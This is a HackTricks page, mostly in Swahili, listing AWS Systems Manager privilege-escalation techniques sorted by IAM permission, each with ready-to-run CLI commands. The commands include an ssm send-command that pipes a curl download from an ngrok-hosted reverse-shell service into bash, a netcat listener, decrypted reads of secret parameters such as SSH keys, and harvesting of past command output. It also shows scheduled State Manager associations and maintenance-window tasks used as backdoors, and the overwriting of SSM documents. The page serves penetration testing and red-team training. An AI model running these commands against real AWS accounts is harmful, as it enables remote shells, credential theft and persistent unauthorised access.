AWS - SSM Privesc

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

SSM

Kwa taarifa zaidi kuhusu SSM angalia:

AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum

ssm:SendCommand

Mshambuliaji aliye na ruhusa ssm:SendCommand anaweza kutekeleza commands kwenye instances zinazoendesha Amazon SSM Agent na ku-compromise IAM Role inayofanya kazi ndani yake.

# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Send rev shell command
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"

Ikiwa unatumia technique hii ili kuongeza privileges ndani ya EC2 instance ambayo tayari imeshaharibiwa, unaweza tu kunasa rev shell locally kwa:

# If you are in the machine you can capture the reverseshel inside of it
nc -lvnp 4444 #Inside the EC2 instance
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"

Athari Inayowezekana: Direct privesc hadi kwa EC2 IAM roles zilizounganishwa na instances zinazoendeshwa na SSM Agents zinazoendeshwa.

ssm:StartSession

Mshambulizi aliye na ruhusa ssm:StartSession anaweza kuanza session inayofanana na SSH katika instances zinazoendesha Amazon SSM Agent na kucompromise IAM Role inayofanya kazi ndani yake.

# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Send rev shell command
aws ssm start-session --target "$INSTANCE_ID"

Caution

Ili kuanza session unahitaji SessionManagerPlugin ikiwa imewekwa: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html

Potential Impact: Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.

Privesc to ECS

Wakati ECS tasks zinaendeshwa na ExecuteCommand enabled, users wenye permissions za kutosha wanaweza kutumia ecs execute-command ili execute a command ndani ya container.
Kulingana na the documentation hili hufanyika kwa kuunda secure channel kati ya device unayotumia kuanzisha command ya “exec” na target container kwa kutumia SSM Session Manager. (SSM Session Manager Plugin inahitajika ili hili lifanye kazi)
Kwa hivyo, users wenye ssm:StartSession wataweza get a shell inside ECS tasks zikiwa na option hiyo enabled kwa kuendesha tu:

aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"

Athari Inayowezekana: Direct privesc kwa ECSIAM roles zilizoambatishwa kwa running tasks zenye ExecuteCommand imewezeshwa.

ssm:ResumeSession

An attacker mwenye permission ssm:ResumeSession anaweza ku-restart a SSH like session in instances zinazoendesha Amazon SSM Agent zenye hali ya SSM session iliyokatika (disconnected) na compromise the IAM Role inayoendeshwa ndani yake.

# Check for configured instances
aws ssm describe-sessions

# Get resume data (you will probably need to do something else with this info to connect)
aws ssm resume-session \
--session-id Mary-Major-07a16060613c408b5

Athari Inayowezekana: Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running and disconected sessions.

ssm:DescribeParameters, (ssm:GetParameter | ssm:GetParameters)

Mshambuliaji mwenye permissions zilizotajwa ataweza kuorodhesha SSM parameters na kuzisoma katika clear-text. Katika parameters hizi unaweza mara nyingi kupata taarifa nyeti kama vile SSH keys au API keys.

aws ssm describe-parameters
# Suppose that you found a parameter called "id_rsa"
aws ssm get-parameters --names id_rsa --with-decryption
aws ssm get-parameter --name id_rsa --with-decryption

Athari Inayowezekana: Pata taarifa nyeti ndani ya parameters.

ssm:ListCommands

Mshambulizi aliye na ruhusa hii anaweza kuorodhesha commands zote zilizotumwa na, kwa matumaini, kupata taarifa nyeti ndani yake.

aws ssm list-commands

Athari inayowezekana: Pata taarifa nyeti ndani ya command lines.

ssm:GetCommandInvocation, (ssm:ListCommandInvocations | ssm:ListCommands)

Mshambuliaji mwenye permissions hizi anaweza kuorodhesha commands zote zilizotumwa na kusoma output iliyozalishwa, akitumaini kupata taarifa nyeti humo.

# You can use any of both options to get the command-id and instance id
aws ssm list-commands
aws ssm list-command-invocations

aws ssm get-command-invocation --command-id <cmd_id> --instance-id <i_id>

Athari Inayowezekana: Tafuta taarifa nyeti ndani ya output ya command lines.

Using ssm:CreateAssociation

Mshambuliaji mwenye permission ssm:CreateAssociation anaweza kuunda State Manager Association ili kiotomatiki execute commands kwenye EC2 instances zinazosimamiwa na SSM. Haya associations yanaweza configured ku-run kwa fixed interval, na kuyafanya yanafaa kwa backdoor-like persistence bila interactive sessions.

aws ssm create-association \
--name SSM-Document-Name \
--targets Key=InstanceIds,Values=target-instance-id \
--parameters commands=["malicious-command"] \
--schedule-expression "rate(30 minutes)" \
--association-name association-name

Note

Mbinu hii ya persistence hufanya kazi mradi tu EC2 instance inasimamiwa na Systems Manager, SSM agent inafanya kazi, na attacker ana ruhusa ya ku-create associations. Haihitaji interactive sessions au explicit ssm:SendCommand permissions. Important: parameta ya --schedule-expression (mfano, rate(30 minutes)) lazima iheshimu minimum interval ya AWS ya dakika 30. Kwa immediate au one-time execution, acha --schedule-expression kabisa — association itatekelezwa mara moja baada ya creation.

ssm:UpdateDocument, ssm:UpdateDocumentDefaultVersion, (ssm:ListDocuments | ssm:GetDocument)

Attacker mwenye permissions ssm:UpdateDocument na ssm:UpdateDocumentDefaultVersion anaweza kuongeza privileges kwa kurekebisha existing documents. Hii pia inaruhusu persistence ndani ya document hiyo. Kivitendo attacker pia angehitaji ssm:ListDocuments ili kupata majina ya custom documents na kama attacker anataka kuficha payload yake ndani ya existing document ssm:GetDocument pia ingekuwa necessary.

aws ssm list-documents
aws ssm get-document --name "target-document" --document-format YAML
# You will need to specify the version you're updating
aws ssm update-document \
--name "target-document" \
--document-format YAML \
--content "file://doc.yaml" \
--document-version 1
aws ssm update-document-default-version --name "target-document" --document-version 2

Hapa chini ni mfano wa document ambao unaweza kutumika ku-overwrite document iliyopo. Utataka kuhakikisha document type yako inalingana na document type ya target ili kuepuka issues wakati wa innvocation. Document hapa chini, kwa mfano, itatumia examples za ssm:SendCommand na ssm:CreateAssociation.

schemaVersion: '2.2'
description: Execute commands on a Linux instance.
parameters:
commands:
type: StringList
description: "The commands to run."
displayType: textarea
mainSteps:
- action: aws:runShellScript
name: runCommands
inputs:
runCommand:
- "id > /tmp/pwn_test.txt"

ssm:RegisterTaskWithMaintenanceWindow, ssm:RegisterTargetWithMaintenanceWindow, (ssm:DescribeMaintenanceWindows | ec2:DescribeInstances)

Mshambulizi mwenye ruhusa ssm:RegisterTaskWithMaintenanceWindow na ssm:RegisterTargetWithMaintenanceWindow anaweza kuinua privileges kwa kwanza kusajili target mpya na existing maintenance window kisha kusasisha kwa kusajili task mpya. Hii husababisha execution kwenye existing targets, lakini inaweza kumruhusu mshambulizi ku-compromise compute zenye roles tofauti kwa kusajili targets mpya. Hii pia huruhusu persistence kwa sababu maintenance windows tasks hutekelezwa kwa interval iliyofafanuliwa awali wakati wa window creation. Kwa vitendo mshambulizi pia angehitaji ssm:DescribeMaintenanceWindows ili kupata maintenance window IDs.

aws ec2 describe-instances
aws ssm describe-maintenance-window
aws ssm register-target-with-maintenance-window \
--window-id "<mw-id>" \
--resource-type "INSTANCE" \
--targets "Key=InstanceIds,Values=<instance_id>"
aws ssm register-task-with-maintenance-window \
--window-id "<mw-id>" \
--task-arn "AWS-RunShellScript" \
--task-type "RUN_COMMAND" \
--targets "Key=WindowTargetIds,Values=<target_id>" \
--task-invocation-parameters '{ "RunCommand": { "Parameters": { "commands": ["echo test > /tmp/regtaskpwn.txt"] } } }' \
--max-concurrency 50 \
--max-errors 100

Codebuild

Unaweza pia kutumia SSM kuingia ndani ya codebuild project inayojengwa:

AWS - Codebuild Privesc

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks